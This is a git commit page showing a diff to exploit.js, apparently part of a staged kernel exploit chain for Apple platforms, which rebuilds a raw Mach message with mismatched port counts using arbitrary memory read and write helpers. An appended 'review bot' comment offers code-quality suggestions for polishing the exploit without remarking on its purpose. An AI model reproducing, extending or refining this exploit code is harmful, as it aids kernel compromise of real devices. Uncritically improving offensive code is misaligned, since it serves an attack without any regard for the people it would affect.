| author | spv420 <spv@spv.sh> | 2022-08-01 13:45:45 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-08-01 13:45:45 -0400 |
| commit | 7a206940e14b0d269744bd598be075e33ef19aea (patch) | |
| tree | bc257982f7ee4e291a183aa4153268974285eecd /src/stage4/kexp | |
| parent | 5ed6a7bb64ecf24c6dd12506688b43d9f33b65d2 (diff) | |
fuck
Diffstat (limited to 'src/stage4/kexp')
| -rwxr-xr-x | src/stage4/kexp/exploit.js | 43 |
1 files changed, 24 insertions, 19 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 8103639..327c813 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -277,28 +277,33 @@ function release_port_ptrs(port) {
 function r3gister(task, init_port_set, real_count, fake_count) {
 var mess = shit_heap(0x1000);
-// var InP = mess;
-// var OutP = mess;
-
- var InP = new Request(1, mess);
- var OutP = new Reply(1, mess);
-
- write_u32(InP + 0x18, 1);
- write_u32(InP + 0x1c, init_port_set);
- write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
- write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
- write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
- write_u32(InP + 0x30, fake_count);
- write_u32(InP + 0x0, 0x80001513);
- write_u32(InP + 0x8, task);
- write_u32(InP + 0xc, mig_get_reply_port());
- write_u32(InP + 0x14, 3403);
-
- var ret = mach_msg(InP, 0x3, 0x34, 0x2c, read_u32(InP + 0xc), MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ var InP_ptr = mess;
+ var OutP = mess;
+
+ var InP = new Request_r3(1, mess);
+ var InP_obj = InP.deref();
+
+ InP_obj.msgh_body.msgh_descriptor_count = 1;
+ InP_obj.init_port_set.address = init_port_set;
+ InP_obj.init_port_set.count = real_count;
+ InP_obj.init_port_set.disposition = 19;
+ InP_obj.init_port_set.deallocate = false;
+ InP_obj.init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ InP_obj.NDR = read_buf(NDR_record + get_dyld_shc_slide(), 8);
+ InP_obj.init_port_setCnt = fake_count;
+ InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ InP_obj.Head.msgh_remote_port = task;
+ InP_obj.Head.msgh_local_port = mig_get_reply_port();
+ InP_obj.Head.msgh_id = 3403;
+
+ InP.write(InP_obj);
+
+ var ret = mach_msg(InP.addy, 0x3, 0x34, 0x2c, InP_obj.Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
 if (ret == KERN_SUCCESS) {
+ // i'm not making a fucking class for this shit
 ret = read_u32(OutP + 0x24);
 }
+ return ret;
 } |
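Review bot: `var InP_ptr = mess;` at the top of the new body is never read again inside r3gister — the `mach_msg` call passes `InP.addy` — so it is dead and should be removed, or replaced by a comment if it was meant to record that the request is built in place over `mess`. The request side now goes through `Request_r3`, but the send and receive sizes `0x34`/`0x2c` and the reply read at `OutP + 0x24` are still raw numbers that must agree with that layout; a comment such as `// send/recv sizes and the 0x24 reply offset must match the Request_r3 layout` on the `mach_msg` line, or taking the size from the struct object if it exposes one, would keep them from silently drifting apart when the struct changes. `InP_obj.init_port_set.disposition = 19` and `MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)` both hard-code 19 while the local side uses a named constant; if the file defines a named constant for that disposition value, using it in both places makes the two agree by construction. Separately, the pre-existing `ret == KERN_SUCCESS` uses loose equality; `===` is safer here since `ret` is afterwards reassigned to a raw reply word read from `OutP`.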
